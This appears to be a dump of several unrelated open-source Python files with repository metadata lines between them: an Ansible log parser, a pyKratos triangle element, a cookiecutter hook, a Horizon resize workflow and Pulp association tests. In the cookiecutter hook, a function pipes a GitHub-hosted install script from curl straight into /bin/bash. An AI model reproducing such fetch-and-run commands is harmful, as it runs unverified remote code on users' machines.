play = self.readlog_list[0].get('play', {})
task = self.readlog_list[0].get('task', {})
newlog_dict = {
'name' : name,
'mode' : exec_mode,
'describe' : describe,
'create_time' : timestamp2datetime(create_ts),
'create_date' : create_date,
'options' : options,
'uuid' : uuid_str,
'inventory_content' : inventory_content,
'end_time':timestamp2datetime(finish_ts),
'duration' : round((finish_ts - create_ts), 3),
}
if exec_mode == 'adhoc' :
newlog_dict['pattern'] = pattern
newlog_dict['module_name'] = module_name
newlog_dict['module_args'] = module_args
else :
newlog_dict['yaml_content'] = yaml_content
get_field_list = ['uuid' , 'play_id' , 'task_id']
result = self.mongoclient.group_by(self.collect, get_field_list)
if not result[0] :
self.logger.error(log_prefix + '失败,原因:该任务还没有开始执行或者数据错误,' + result[1])
return (False, '该任务还没有开始执行或者数据错误')
tempplay_dict = {}
for playid in result[1] :
if playid['uuid'] == uuid_str :
play_id = playid['play_id']
task_id = playid.get('task_id', '')
if task_id == '' :
continue
else :
continue
if play_id not in tempplay_dict :
tempplay_dict[play_id] = []
taskid_list = tempplay_dict[play_id]
taskid_list.append(task_id)
taskid_list = tempplay_dict[play_id]
taskid_list = list(set(taskid_list))
taskid_list = sorted(taskid_list)
# 对taskid执行先后顺序排序
tempplay_dict[play_id] = taskid_list
playid_dict = {}
for play_id in sorted(tempplay_dict) :
playid_dict[play_id] = tempplay_dict[play_id]
# 对play执行先后顺序排序
play_dict = {}
# 下面这个循环用于:根据play_id获取下面所有的task_id,并获取的每个task_id的最后日志和执行结果信息
for playid, taskid_list in playid_dict.items() :
play_dict[playid] = {}
for taskid in taskid_list :
task_list = []
for line in self.readlog_list :
if line['play_id'] == playid and line.get('task_id', '') == taskid :
summary = line.get('summary', {})
if not summary :
task_list.append(line)
last_log = task_list[-1]
# 求这个任务执行的最后一条日志
play_dict[playid]['play']=last_log.get('play', {})
play_dict[playid]['summary'] = summary
task_dict = {
'task' : last_log.get('task', {}),
'detail' : last_log.get('detail', {}),
}
try:
play_dict[playid]['task'][taskid] = task_dict
except:
play_dict[playid]['task'] = {}
play_dict[playid]['task'][taskid] = task_dict
if not play_dict or not isinstance(play_dict, dict) :
self.logger.error(log_prefix + '失败,原因:该任务还没有开始执行或者查询条件错误,' + result[1])
return (False, {'result' : '该任务还没有开始执行或者查询条件错误'})
result_dict = {}
for play_uuid, logline in play_dict.items() :
result_dict[play_uuid] = {}
summary = logline.get('summary', {})
task_dict = logline.get('task', {})
if 'tasks' not in result_dict[play_uuid]:
result_dict[play_uuid]['tasks'] = {}
play = logline.get('play', {})
pattern = play.get('name', {})
for task_id, line in task_dict.items() :
task = line.get('task', {})
task_name = task.get('name', '')
taskmodule = task.get('module', '')
# task_args = task.get('args', {})
if exec_mode == 'playbook' and task_name not in result_dict[play_uuid]['tasks'] :
result_dict[play_uuid]['tasks'][task_name] = {}
new_task = {
'module' : task['module'],
}
result_dict[play_uuid]['tasks'][task_name]['tasks'] = new_task
detail = line.get('detail', {})
if not isinstance(detail, dict) or not detail:
continue
for host , value in detail.items() :
end_ts = value['end_ts']
start_ts = value['start_ts']
duration = end_ts - start_ts
duration = round(duration, 2)
'''
if taskmodule == 'yum' and 'invocation' in value :
# 在yum模块中,在没有使用循环的情况下,value也含有results的key
results = [value]
else :
results = value.get('results', {})
if results :
data_list = results
else :
data_list = [value]
# data_list = [value]
'''
data_list = [value]
for data in data_list :
from library.connecter.ansible.callback.module import Parse_Result
parse_module = Parse_Result()
if taskmodule == 'command' :
result = parse_module.command(data, task)
elif taskmodule == 'yum' :
if 'invocation' in data :
result = parse_module.yum(data, task)
else:
try:
temp_dict = data['results'][0]
del data['results']
data.update(temp_dict)
result = parse_module.yum(data, task)
except :
self.logger.error(data)
result = parse_module.common_module(data, task, {})
elif taskmodule == 'service' or taskmodule == 'systemd':
result = parse_module.service(data, task)
elif taskmodule == 'script' :
result = parse_module.script(data, task)
elif taskmodule == 'cron' :
result = parse_module.cron(data, task)
elif taskmodule == 'user' :
result = parse_module.user(data, task)
elif taskmodule == 'copy' :
result = parse_module.copy(data, task)
elif taskmodule == 'get_url' :
result = parse_module.get_url(data, task)
elif taskmodule == 'raw' :
result = parse_module.command(data, task)
else :
result = parse_module.common_module(data, task, {})
if taskmodule == '' :
print(result)
if exec_mode == 'playbook' :
try :
del result['模块名']
except :
pass
if 'detail' not in result_dict[play_uuid]['tasks'][task_name] :
result_dict[play_uuid]['tasks'][task_name]['detail'] = {}
result_dict[play_uuid]['tasks'][task_name]['detail'][host] = result
result_dict[play_uuid]['pattern'] = pattern
else :
try :
del result['模块名']
del result_dict[play_uuid]
except :
pass
result_dict[host] = result
if exec_mode == 'playbook' :
result_dict[play_uuid]['summary'] = {}
if isinstance(summary, dict):
for host in summary :
ok = summary[host].get('ok', 0)
failures = summary[host].get('failures', 0)
unreachable = summary[host].get('unreachable', 0)
changed = summary[host].get('changed', 0)
skipped = summary[host].get('skipped', 0)
if ok == 0 :
if unreachable == 1:
summary_str = '该任务在该主机上执行失败,无法连接远程主机'
else :
summary_str = '该任务在该主机上执行失败,失败数为' + str(failures) + ',跳过数为' + str(skipped) + ',可能产生变化数为' + str(changed)
else :
summary_str = '该任务在该主机上执行部分或者全部成功,成功数为' + str(ok) + ',失败数为' + str(failures) + ',跳过数为' + str(skipped) + ',可能产生变化数为' + str(changed)
'''
result_dict[play_uuid]['summary'][host] = summary[host]
原文输出
'''
result_dict[play_uuid]['summary'][host] = summary_str
if not result_dict[play_uuid]['summary'] :
result_dict[play_uuid]['summary'] = '该任务还没有执行完成'
newlog_dict['exec_result'] = result_dict
self.logger.info(log_prefix + '成功')
return (True, newlog_dict)
def get_abs(self):
'''
获取该用户下所有的执行任务的摘要
'''
get_field_list = ['name', 'uuid' , 'mode' , 'create_time' , 'describe', 'create_date']
result = self.mongoclient.group_by(self.collect, get_field_list)
if not result[0] :
self.logger.error('ansible任务执行报表清单查询失败,原因:' + result[1])
return result
work_list = result[1]
if len(work_list) == 0 :
self.logger.warn('ansible任务执行报表清单为空')
return (True, [])
date_list = []
for work in work_list :
create_date = work['create_time']
if create_date not in date_list :
date_list.append(create_date)
date_list = sorted(date_list)
date_list.reverse()
new_list = []
for date_str in date_list :
for work_dict in work_list :
if date_str == work_dict['create_time'] :
new_list.append(work_dict)
return (True, new_list)
| apache-2.0 | -31,646,538,662,069,950 | 41.16358 | 157 | 0.436791 | false |
RiccardoRossi/pyKratos | pyKratos/triangle.py | 3 | 2711 | from __future__ import print_function, absolute_import, division
import math
from numpy import *
class Triangle:
def __init__(self, node_list):
if(len(node_list) != 3):
raise Exception("wrong number of nodes! should be 3!!")
self.nodes = node_list
for node in self.nodes:
if(node.Id < 0):
raise Exception("node with Id lesser than 0 found")
# def Nodes(self):
# return self.nodes
def __getitem__(self, key):
return self.nodes[key]
def GetNumberOfNodes(self):
return 3
def ShapeFunctions(self, order=1):
'''this function provides the shape function values, derivatives and integration_weight'''
'''at the location of the gauss points. Order of integration is controlled'''
'''by the optional parameter "order".'''
'''N[gauss][i] contains the shape function of node i computed at the position of "gauss" '''
'''derivatives[gauss][i,k] contains the derivative of node i, component k at the position of gauss '''
'''weights[gauss] includes the integration weights, including the det of the jacobian, to be used '''
'''at the gauss point'''
derivatives = []
weights = []
Ncontainer = []
x10 = self.nodes[1].coordinates[0] - self.nodes[0].coordinates[0]
y10 = self.nodes[1].coordinates[1] - self.nodes[0].coordinates[1]
x20 = self.nodes[2].coordinates[0] - self.nodes[0].coordinates[0]
y20 = self.nodes[2].coordinates[1] - self.nodes[0].coordinates[1]
detJ = x10 * y20 - y10 * x20
DN_DX = zeros((3, 2), dtype=float)
DN_DX[0, 0] = -y20 + y10
DN_DX[0, 1] = x20 - x10
DN_DX[1, 0] = y20
DN_DX[1, 1] = -x20
DN_DX[2, 0] = -y10
DN_DX[2, 1] = x10
DN_DX /= detJ
if(order == 1): # give back 1 single integration point
one_third = 1.0 / 3.0
Ncontainer = [array([one_third, one_third, one_third])]
Area = 0.5 * detJ
weights = [Area]
derivatives = [DN_DX]
elif(order == 2): # gives back 3 integration points
one_sixt = 1.0 / 6.0
two_third = 2.0 / 3.0
Ncontainer.append(array([one_sixt, one_sixt, two_third]))
Ncontainer.append(array([one_sixt, two_third, one_sixt]))
Ncontainer.append(array([two_third, one_sixt, one_sixt]))
weights = [one_sixt * detJ, one_sixt * detJ, one_sixt * detJ]
derivatives = [DN_DX, DN_DX, DN_DX]
else:
raise Exception("integration order not implemented")
return [Ncontainer, derivatives, weights]
| bsd-2-clause | -4,895,764,524,958,060,000 | 34.207792 | 110 | 0.568056 | false |
r0x73/django-template | hooks/post_gen_project.py | 1 | 2145 | #!/usr/bin/env python
import os
import shutil
def install_drifter():
os.system('git init .')
os.system('curl -sS https://raw.githubusercontent.com/liip/drifter/master/install.sh | /bin/bash')
def set_parameter(path, key, value):
patched_lines = []
parameter_exists = False
with open(path) as f:
lines = f.readlines()
for line in lines:
if line.startswith('{}:'.format(key)):
line = '{key}: "{value}"\n'.format(key=key, value=value)
parameter_exists = True
patched_lines.append(line)
if not parameter_exists:
patched_lines.append('{key}: "{value}"\n'.format(key=key, value=value))
with open(path, 'w') as f:
f.write(''.join(patched_lines))
def patch_parameters(path):
set_parameter(path, 'pip_requirements', 'requirements/dev.txt')
set_parameter(path, 'pip_requirements_dir', 'requirements')
set_parameter(path, 'project_name', '{{ cookiecutter.project_slug }}')
set_parameter(path, 'database_name', '{{ cookiecutter.project_slug }}')
set_parameter(path, 'hostname', "{{ cookiecutter.project_slug.replace('_', '-') }}.lo")
set_parameter(path, 'python_version', '3')
def patch_playbook(path):
patched_lines = []
with open(path) as f:
lines = f.readlines()
for line in lines:
if 'role: django' in line or 'role: postgresql' in line:
line = line.replace('# -', '-')
patched_lines.append(line)
with open(path, 'w') as f:
f.write(''.join(patched_lines))
if __name__ == '__main__':
if '{{ cookiecutter.use_drifter }}' == 'y':
install_drifter()
patch_parameters('virtualization/parameters.yml')
patch_playbook('virtualization/playbook.yml')
if '{{ cookiecutter.use_djangocms }}' == 'y':
shutil.copyfile('{{ cookiecutter.project_slug }}/templates/base_cms.html', '{{ cookiecutter.project_slug }}/templates/base.html')
if '{{ cookiecutter.override_user_model }}' == 'n':
shutil.rmtree('{{ cookiecutter.project_slug }}/accounts')
os.remove('{{ cookiecutter.project_slug }}/templates/base_cms.html')
| mit | -3,953,665,156,925,937,700 | 30.544118 | 137 | 0.618648 | false |
mdavid/horizon | openstack_dashboard/dashboards/project/instances/workflows/resize_instance.py | 56 | 4103 | # Copyright 2013 CentRin Data, Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import json
from django.utils.translation import ugettext_lazy as _
from django.views.decorators.debug import sensitive_variables # noqa
from horizon import exceptions
from horizon import forms
from horizon import workflows
from openstack_dashboard import api
from openstack_dashboard.dashboards.project.instances \
import utils as instance_utils
from openstack_dashboard.dashboards.project.instances.workflows \
import create_instance
class SetFlavorChoiceAction(workflows.Action):
old_flavor_id = forms.CharField(required=False, widget=forms.HiddenInput())
old_flavor_name = forms.CharField(
label=_("Old Flavor"),
widget=forms.TextInput(attrs={'readonly': 'readonly'}),
required=False,
)
flavor = forms.ChoiceField(label=_("New Flavor"),
help_text=_("Choose the flavor to launch."))
class Meta(object):
name = _("Flavor Choice")
slug = 'flavor_choice'
help_text_template = ("project/instances/"
"_flavors_and_quotas.html")
def populate_flavor_choices(self, request, context):
old_flavor_id = context.get('old_flavor_id')
flavors = context.get('flavors').values()
# Remove current flavor from the list of flavor choices
flavors = [flavor for flavor in flavors if flavor.id != old_flavor_id]
if len(flavors) > 1:
flavors = instance_utils.sort_flavor_list(request, flavors)
if flavors:
flavors.insert(0, ("", _("Select a New Flavor")))
else:
flavors.insert(0, ("", _("No flavors available")))
return flavors
def get_help_text(self, extra_context=None):
extra = {} if extra_context is None else dict(extra_context)
try:
extra['usages'] = api.nova.tenant_absolute_limits(self.request)
extra['usages_json'] = json.dumps(extra['usages'])
flavors = json.dumps([f._info for f in
instance_utils.flavor_list(self.request)])
extra['flavors'] = flavors
extra['resize_instance'] = True
except Exception:
exceptions.handle(self.request,
_("Unable to retrieve quota information."))
return super(SetFlavorChoiceAction, self).get_help_text(extra)
class SetFlavorChoice(workflows.Step):
action_class = SetFlavorChoiceAction
depends_on = ("instance_id", "name")
contributes = ("old_flavor_id", "old_flavor_name", "flavors", "flavor")
class ResizeInstance(workflows.Workflow):
slug = "resize_instance"
name = _("Resize Instance")
finalize_button_name = _("Resize")
success_message = _('Scheduled resize of instance "%s".')
failure_message = _('Unable to resize instance "%s".')
success_url = "horizon:project:instances:index"
default_steps = (SetFlavorChoice, create_instance.SetAdvanced)
def format_status_message(self, message):
return message % self.context.get('name', 'unknown instance')
@sensitive_variables('context')
def handle(self, request, context):
instance_id = context.get('instance_id', None)
flavor = context.get('flavor', None)
disk_config = context.get('disk_config', None)
try:
api.nova.server_resize(request, instance_id, flavor, disk_config)
return True
except Exception:
exceptions.handle(request)
return False
| apache-2.0 | 590,134,987,125,771,900 | 38.451923 | 79 | 0.648062 | false |
jeremycline/pulp | server/test/unit/server/managers/repo/test_unit_association.py | 5 | 21452 | import mock
from .... import base
from pulp.devel import mock_plugins
from pulp.plugins.conduits.unit_import import ImportUnitConduit
from pulp.plugins.config import PluginCallConfiguration
from pulp.plugins.model import Unit
from pulp.plugins.types import database, model
from pulp.server.db import model as me_model
from pulp.server.db.model.auth import User
from pulp.server.db.model.criteria import UnitAssociationCriteria
from pulp.server.db.model.repository import RepoContentUnit, RepoImporter
import pulp.server.exceptions as exceptions
import pulp.server.managers.content.cud as content_cud_manager
import pulp.server.managers.factory as manager_factory
import pulp.server.managers.repo.importer as importer_manager
import pulp.server.managers.repo.unit_association as association_manager
TYPE_1_DEF = model.TypeDefinition('type-1', 'Type 1', 'Test Definition One',
['key-1'], ['search-1'], [])
TYPE_2_DEF = model.TypeDefinition('type-2', 'Type 2', 'Test Definition Two',
['key-2a', 'key-2b'], [], ['type-1'])
MOCK_TYPE_DEF = model.TypeDefinition('mock-type', 'Mock Type', 'Used by the mock importer',
['key-1'], [], [])
class RepoUnitAssociationManagerTests(base.PulpServerTests):
def clean(self):
super(RepoUnitAssociationManagerTests, self).clean()
database.clean()
RepoContentUnit.get_collection().remove()
RepoImporter.get_collection().remove()
me_model.Repository.drop_collection()
def tearDown(self):
super(RepoUnitAssociationManagerTests, self).tearDown()
mock_plugins.reset()
manager_factory.reset()
def setUp(self):
super(RepoUnitAssociationManagerTests, self).setUp()
database.update_database([TYPE_1_DEF, TYPE_2_DEF, MOCK_TYPE_DEF])
mock_plugins.install()
self.manager = association_manager.RepoUnitAssociationManager()
self.importer_manager = importer_manager.RepoImporterManager()
self.content_manager = content_cud_manager.ContentManager()
# Set up a valid configured repo for the tests
self.repo_id = 'associate-repo'
with mock.patch('pulp.server.managers.repo.importer.model.Repository.objects'):
self.importer_manager.set_importer(self.repo_id, 'mock-importer', {})
# Create units that can be associated to a repo
self.unit_type_id = 'mock-type'
self.unit_id = 'test-unit-id'
self.unit_key = {'key-1': 'test-unit'}
self.content_manager.add_content_unit(self.unit_type_id, self.unit_id, self.unit_key)
self.unit_id_2 = 'test-unit-id-2'
self.unit_key_2 = {'key-1': 'test-unit-2'}
self.content_manager.add_content_unit(self.unit_type_id, self.unit_id_2, self.unit_key_2)
@mock.patch('pulp.server.managers.repo.unit_association.model.Repository.objects')
def test_associate_by_id(self, mock_repo_qs):
"""
Tests creating a new association by content unit ID.
"""
self.manager.associate_unit_by_id(self.repo_id, 'type-1', 'unit-1')
self.manager.associate_unit_by_id(self.repo_id, 'type-1', 'unit-2')
repo_units = list(RepoContentUnit.get_collection().find({'repo_id': self.repo_id}))
self.assertEqual(2, len(repo_units))
unit_ids = [u['unit_id'] for u in repo_units]
self.assertTrue('unit-1' in unit_ids)
self.assertTrue('unit-2' in unit_ids)
@mock.patch('pulp.server.managers.repo.unit_association.model.Repository.objects')
@mock.patch('pulp.server.managers.repo.unit_association.repo_controller')
def test_associate_by_id_existing(self, mock_ctrl, mock_repo_qs):
"""
Tests attempting to create a new association where one already exists.
"""
# Test
self.manager.associate_unit_by_id(self.repo_id, 'type-1', 'unit-1')
self.manager.associate_unit_by_id(self.repo_id, 'type-1', 'unit-1') # shouldn't error
# Verify
repo_units = list(RepoContentUnit.get_collection().find({'repo_id': self.repo_id}))
self.assertEqual(1, len(repo_units))
self.assertEqual('unit-1', repo_units[0]['unit_id'])
@mock.patch('pulp.server.managers.repo.unit_association.model.Repository.objects')
def test_associate_by_id_other_owner(self, mock_repo_qs):
"""
Tests making a second association using a different owner.
"""
self.manager.associate_unit_by_id(self.repo_id, 'type-1', 'unit-1')
self.manager.associate_unit_by_id(self.repo_id, 'type-1', 'unit-1')
repo_units = list(RepoContentUnit.get_collection().find({'repo_id': self.repo_id}))
self.assertEqual(1, len(repo_units))
self.assertEqual('unit-1', repo_units[0]['unit_id'])
@mock.patch('pulp.server.managers.repo.unit_association.model.Repository.objects')
@mock.patch('pulp.server.managers.repo.unit_association.repo_controller')
def test_associate_all(self, mock_ctrl, mock_repo_qs):
"""
Tests making multiple associations in a single call.
"""
ids = ['foo', 'bar', 'baz']
ret = self.manager.associate_all_by_ids(self.repo_id, 'type-1', ids)
repo_units = list(RepoContentUnit.get_collection().find({'repo_id': self.repo_id}))
self.assertEqual(len(ids), len(repo_units))
# return value should be the number of units that were associated
self.assertEqual(ret, len(repo_units))
for unit in repo_units:
self.assertTrue(unit['unit_id'] in ids)
@mock.patch('pulp.server.managers.repo.unit_association.model.Repository.objects')
@mock.patch('pulp.server.managers.repo.unit_association.repo_controller')
def test_unassociate_by_id(self, mock_ctrl, mock_repo_qs):
"""
Tests removing an association that exists by its unit ID.
"""
self.manager.associate_unit_by_id(self.repo_id, self.unit_type_id, self.unit_id)
self.manager.associate_unit_by_id(self.repo_id, self.unit_type_id, self.unit_id_2)
self.manager.unassociate_unit_by_id(self.repo_id, self.unit_type_id, self.unit_id)
repo_units = list(RepoContentUnit.get_collection().find({'repo_id': self.repo_id}))
self.assertEqual(1, len(repo_units))
self.assertEqual(self.unit_id_2, repo_units[0]['unit_id'])
def test_unassociate_by_id_no_association(self):
"""
Tests unassociating a unit where no association exists.
"""
# Test - Make sure this does not raise an error
self.manager.unassociate_unit_by_id(self.repo_id, 'type-1', 'unit-1')
@mock.patch('pulp.server.managers.repo.unit_association.model.Repository.objects')
def test_associate_from_repo_no_criteria(self, mock_repo_qs):
source_repo_id = 'source-repo'
dest_repo_id = 'dest-repo'
self.importer_manager.set_importer(source_repo_id, 'mock-importer', {})
self.importer_manager.set_importer(dest_repo_id, 'mock-importer', {})
self.content_manager.add_content_unit('mock-type', 'unit-1', {'key-1': 'unit-1'})
self.content_manager.add_content_unit('mock-type', 'unit-2', {'key-1': 'unit-2'})
self.content_manager.add_content_unit('mock-type', 'unit-3', {'key-1': 'unit-3'})
self.manager.associate_unit_by_id(source_repo_id, 'mock-type', 'unit-1')
self.manager.associate_unit_by_id(source_repo_id, 'mock-type', 'unit-2')
self.manager.associate_unit_by_id(source_repo_id, 'mock-type', 'unit-3')
fake_user = User('associate-user', '')
manager_factory.principal_manager().set_principal(principal=fake_user)
mock_plugins.MOCK_IMPORTER.import_units.return_value = [Unit('mock-type', {'k': 'v'}, {},
'')]
# Test
results = self.manager.associate_from_repo(source_repo_id, dest_repo_id)
associated = results['units_successful']
# Verify
self.assertEqual(1, len(associated))
self.assertEqual(associated[0]['type_id'], 'mock-type')
self.assertEqual(associated[0]['unit_key'], {'k': 'v'})
self.assertEqual(1, mock_plugins.MOCK_IMPORTER.import_units.call_count)
mock_repo = mock_repo_qs.get_repo_or_missing_resource.return_value
args = mock_plugins.MOCK_IMPORTER.import_units.call_args[0]
kwargs = mock_plugins.MOCK_IMPORTER.import_units.call_args[1]
self.assertEqual(args[0], mock_repo.to_transfer_repo())
self.assertEqual(args[1], mock_repo.to_transfer_repo())
self.assertEqual(None, kwargs['units']) # units to import
self.assertTrue(isinstance(args[3], PluginCallConfiguration)) # config
conduit = args[2]
self.assertTrue(isinstance(conduit, ImportUnitConduit))
# Clean Up
manager_factory.principal_manager().set_principal(principal=None)
@mock.patch('pulp.server.managers.repo.unit_association.model.Repository.objects')
def test_associate_from_repo_dest_has_no_importer(self, mock_repo_qs):
self.assertRaises(
exceptions.MissingResource,
self.manager.associate_from_repo,
'source-repo',
'repo-with-no-importer'
)
@mock.patch('pulp.server.managers.repo.unit_association.model.Repository.objects')
def test_associate_from_repo_dest_unsupported_types(self, mock_repo_qs):
source_repo_id = 'source-repo'
dest_repo_id = 'dest-repo'
self.importer_manager.set_importer(source_repo_id, 'mock-importer', {})
self.assertRaises(exceptions.MissingResource,
self.manager.associate_from_repo, source_repo_id, dest_repo_id)
@mock.patch('pulp.server.managers.repo.unit_association.model.Repository.objects')
def test_associate_from_repo_importer_error(self, mock_repo_qs):
source_repo_id = 'source-repo'
dest_repo_id = 'dest-repo'
self.importer_manager.set_importer(source_repo_id, 'mock-importer', {})
self.importer_manager.set_importer(dest_repo_id, 'mock-importer', {})
mock_plugins.MOCK_IMPORTER.import_units.side_effect = Exception()
self.content_manager.add_content_unit('mock-type', 'unit-1', {'key-1': 'unit-1'})
self.manager.associate_unit_by_id(source_repo_id, 'mock-type', 'unit-1')
# Test
try:
self.manager.associate_from_repo(source_repo_id, dest_repo_id)
self.fail('Exception expected')
except exceptions.PulpExecutionException:
pass
# Cleanup
mock_plugins.MOCK_IMPORTER.import_units.side_effect = None
@mock.patch('pulp.server.managers.repo.unit_association.model.Repository.objects')
def test_associate_from_repo_no_matching_units(self, mock_repo_qs):
source_repo_id = 'source-repo'
dest_repo_id = 'dest-repo'
self.importer_manager.set_importer(source_repo_id, 'mock-importer', {})
self.importer_manager.set_importer(dest_repo_id, 'mock-importer', {})
mock_plugins.MOCK_IMPORTER.import_units.return_value = []
ret = self.manager.associate_from_repo(source_repo_id, dest_repo_id)
self.assertEqual(1, mock_plugins.MOCK_IMPORTER.import_units.call_count)
self.assertEqual(ret.get('units_successful'), [])
@mock.patch('pulp.server.managers.repo.unit_association.model.Repository.objects')
def test_associate_from_repo_missing_source(self, mock_repo_qs):
dest_repo_id = 'dest-repo'
self.importer_manager.set_importer(dest_repo_id, 'mock-importer', {})
try:
self.manager.associate_from_repo('missing', dest_repo_id)
self.fail('Exception expected')
except exceptions.MissingResource, e:
self.assertTrue('missing' == e.resources['repository'])
@mock.patch('pulp.server.managers.repo.unit_association.model.Repository.objects')
def test_associate_from_repo_missing_destination(self, mock_repo_qs):
source_repo_id = 'source-repo'
self.importer_manager.set_importer(source_repo_id, 'mock-importer', {})
try:
self.manager.associate_from_repo(source_repo_id, 'missing')
self.fail('Exception expected')
except exceptions.MissingResource, e:
self.assertTrue('missing' == e.resources['repository'])
@mock.patch('pulp.server.managers.repo.unit_association.model.Repository.objects')
@mock.patch('pulp.server.managers.repo.unit_association.repo_controller')
def test_associate_by_id_calls_update_unit_count(self, mock_ctrl, mock_repo_qs):
self.manager.associate_unit_by_id(self.repo_id, 'type-1', 'unit-1')
mock_ctrl.update_unit_count.assert_called_once_with(self.repo_id, 'type-1', 1)
@mock.patch('pulp.server.managers.repo.unit_association.model.Repository.objects')
@mock.patch('pulp.server.managers.repo.unit_association.repo_controller')
def test_associate_by_id_calls_update_last_unit_added(self, mock_ctrl, mock_repo_qs):
self.manager.associate_unit_by_id(self.repo_id, 'type-1', 'unit-1')
mock_ctrl.update_last_unit_added.assert_called_once_with(self.repo_id)
@mock.patch('pulp.server.controllers.repository.update_unit_count')
def test_associate_by_id_does_not_call_update_unit_count(self, mock_call):
"""
This would be the case when doing a bulk update.
"""
self.manager.associate_unit_by_id(
self.repo_id, 'type-1', 'unit-1', False)
self.assertFalse(mock_call.called)
@mock.patch('pulp.server.managers.repo.unit_association.model.Repository.objects')
@mock.patch('pulp.server.managers.repo.unit_association.repo_controller')
def test_associate_non_unique_by_id(self, mock_ctrl, mock_repo_qs):
"""
non-unique call should not increment the count
"""
self.manager.associate_unit_by_id(self.repo_id, 'type-1', 'unit-1')
# creates a non-unique association for which the count should not be
# incremented
self.manager.associate_unit_by_id(self.repo_id, 'type-1', 'unit-1')
self.assertEqual(mock_ctrl.update_unit_count.call_count, 1) # only from first associate
@mock.patch('pulp.server.managers.repo.unit_association.model.Repository.objects')
@mock.patch('pulp.server.managers.repo.unit_association.repo_controller')
def test_associate_all_by_ids_calls_update_unit_count(self, mock_ctrl, mock_repo_qs):
IDS = ('foo', 'bar', 'baz')
self.manager.associate_all_by_ids(self.repo_id, 'type-1', IDS)
mock_ctrl.update_unit_count.assert_called_once_with(self.repo_id, 'type-1', len(IDS))
@mock.patch('pulp.server.managers.repo.unit_association.model.Repository.objects')
@mock.patch('pulp.server.managers.repo.unit_association.repo_controller')
def test_associate_all_by_id_calls_update_last_unit_added(self, mock_ctrl, mock_repo_qs):
self.manager.associate_unit_by_id(self.repo_id, 'type-1', 'unit-1')
mock_ctrl.update_last_unit_added.assert_called_once_with(self.repo_id)
@mock.patch('pulp.server.managers.repo.unit_association.model.Repository.objects')
@mock.patch('pulp.server.managers.repo.unit_association.repo_controller')
def test_associate_all_non_unique(self, mock_ctrl, mock_repo_qs):
"""
Makes sure when two identical associations are requested, they only
get counted once.
"""
IDS = ('foo', 'bar', 'foo')
self.manager.associate_all_by_ids(self.repo_id, 'type-1', IDS)
mock_ctrl.update_unit_count.assert_called_once_with(self.repo_id, 'type-1', 2)
@mock.patch('pulp.server.managers.repo.unit_association.model.Repository.objects')
@mock.patch('pulp.server.managers.repo.unit_association.repo_controller')
def test_unassociate_all(self, mock_ctrl, mock_repo_qs):
"""
Tests unassociating multiple units in a single call.
"""
# Setup
self.manager.associate_unit_by_id(self.repo_id, self.unit_type_id, self.unit_id)
# Add a different user to ensure they will remove properly
self.manager.associate_unit_by_id(self.repo_id, self.unit_type_id, self.unit_id_2)
self.manager.associate_unit_by_id(self.repo_id, 'type-2', 'unit-1')
self.manager.associate_unit_by_id(self.repo_id, 'type-2', 'unit-2')
unit_coll = RepoContentUnit.get_collection()
self.assertEqual(4, len(list(unit_coll.find({'repo_id': self.repo_id}))))
# Test
results = self.manager.unassociate_all_by_ids(self.repo_id, self.unit_type_id,
[self.unit_id, self.unit_id_2])
unassociated = results['units_successful']
# Verify
self.assertEqual(len(unassociated), 2)
for u in unassociated:
self.assertTrue(isinstance(u, dict))
self.assertTrue(u['type_id'], self.unit_type_id)
self.assertTrue(u['unit_key'] in [self.unit_key, self.unit_key_2])
self.assertEqual(2, len(list(unit_coll.find({'repo_id': self.repo_id}))))
self.assertTrue(unit_coll.find_one({'repo_id': self.repo_id, 'unit_type_id': 'type-2',
'unit_id': 'unit-1'}) is not None)
self.assertTrue(unit_coll.find_one({'repo_id': self.repo_id, 'unit_type_id': 'type-2',
'unit_id': 'unit-2'}) is not None)
@mock.patch('pulp.server.managers.repo.unit_association.model.Repository.objects')
@mock.patch('pulp.server.managers.repo.unit_association.repo_controller')
def test_unassociate_by_id_calls_update_unit_count(self, mock_ctrl, mock_repo_qs):
self.manager.associate_unit_by_id(self.repo_id, self.unit_type_id, self.unit_id)
self.manager.unassociate_unit_by_id(self.repo_id, self.unit_type_id, self.unit_id)
self.assertEqual(2, mock_ctrl.update_unit_count.call_count)
self.assertEqual(mock_ctrl.update_unit_count.call_args_list[0][0][0], self.repo_id)
self.assertEqual(mock_ctrl.update_unit_count.call_args_list[1][0][1], self.unit_type_id)
self.assertEqual(mock_ctrl.update_unit_count.call_args_list[0][0][2], 1)
self.assertEqual(mock_ctrl.update_unit_count.call_args_list[1][0][0], self.repo_id)
self.assertEqual(mock_ctrl.update_unit_count.call_args_list[1][0][1], self.unit_type_id)
self.assertEqual(mock_ctrl.update_unit_count.call_args_list[1][0][2], -1)
@mock.patch('pulp.server.managers.repo.unit_association.repo_controller')
def test_unassociate_by_id_non_unique(self, mock_ctrl):
self.manager.associate_unit_by_id(self.repo_id, 'type-1', 'unit-1')
self.manager.associate_unit_by_id(self.repo_id, 'type-1', 'unit-1')
self.manager.unassociate_unit_by_id(self.repo_id, 'type-1', 'unit-1')
mock_ctrl.update_unit_count.assert_called_once_with(self.repo_id, 'type-1', 1)
mock_ctrl.update_last_unit_added.assert_called_once_with(self.repo_id)
@mock.patch('pymongo.cursor.Cursor.count', return_value=1)
def test_association_exists_true(self, mock_count):
self.assertTrue(self.manager.association_exists(self.repo_id, 'unit-1', 'type-1'))
self.assertEqual(mock_count.call_count, 1)
@mock.patch('pymongo.cursor.Cursor.count', return_value=0)
def test_association_exists_false(self, mock_count):
self.assertFalse(self.manager.association_exists(self.repo_id, 'type-1', 'unit-1'))
self.assertEqual(mock_count.call_count, 1)
@mock.patch('pulp.server.managers.repo.unit_association.repo_controller')
@mock.patch('pulp.server.managers.repo.unit_association.model.Repository.objects')
def test_unassociate_via_criteria(self, mock_repo_qs, mock_ctrl):
self.manager.associate_unit_by_id(self.repo_id, self.unit_type_id, self.unit_id)
self.manager.associate_unit_by_id(self.repo_id, self.unit_type_id, self.unit_id_2)
criteria_doc = {'filters': {'association': {'unit_id': {'$in': [self.unit_id, 'unit-X']}}}}
criteria = UnitAssociationCriteria.from_client_input(criteria_doc)
self.manager.unassociate_by_criteria(self.repo_id, criteria)
self.assertFalse(self.manager.association_exists(self.repo_id, self.unit_id,
self.unit_type_id))
